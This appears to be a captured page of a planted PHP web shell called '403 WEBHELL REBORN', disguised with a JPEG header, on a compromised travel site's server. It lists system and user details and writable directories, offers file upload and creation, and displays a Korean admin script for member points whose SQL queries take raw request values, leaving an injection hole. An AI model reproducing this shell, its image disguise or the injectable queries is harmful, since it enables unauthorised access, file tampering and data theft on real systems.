ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache
System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : tkt_travelbus ( 1137)
PHP Version : 7.0.0p1
Disable Function : mysql_pconnect
Directory :  /tkt_travelbus/www/admin/member/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /tkt_travelbus/www/admin/member/person_point_proc.html
<?
include "../include/top_proc.html";//공통파일 인클루드
include "_common.php";


//테이블
$table = "TB_POINT_LOG";

$pp = str_replace(",","",$pp);
$mp = str_replace(",","",$mp);
$point = str_replace(",","",$point);

// 포인트 삭제
if($SqlType=="point_del"){
	if(!$pno) exit;
	
	//$sql = "update {$table} set del_fg='Y' where pno='{$pno}' ";
	$sql = "delete from {$table} where pno='{$pno}' ";
	
	db_query($sql);
	
	//movepage("person_point.html?{$_href}&seq={$seq}");
	error_msg("document.location.reload();","script");
}

// 포인트 저장
elseif($SqlType=="point_ins") {
	if(!$mb_id) exit;
	
	if($mpoint=="+") $pp = $point;
	else $mp = $point;
	
	$class_CommonTour = new CommonTour();
	
	$rdata = array("mode"=>"mb_point_ins","pp"=>$pp,"mp"=>$mp,"pcont"=>$pcont,"mb_id"=>$mb_id);
	

	$r = $class_CommonTour->pointIns($rdata);

	error_msg("parent.document.location.reload();","script");
}

?>

Anon7 - 2021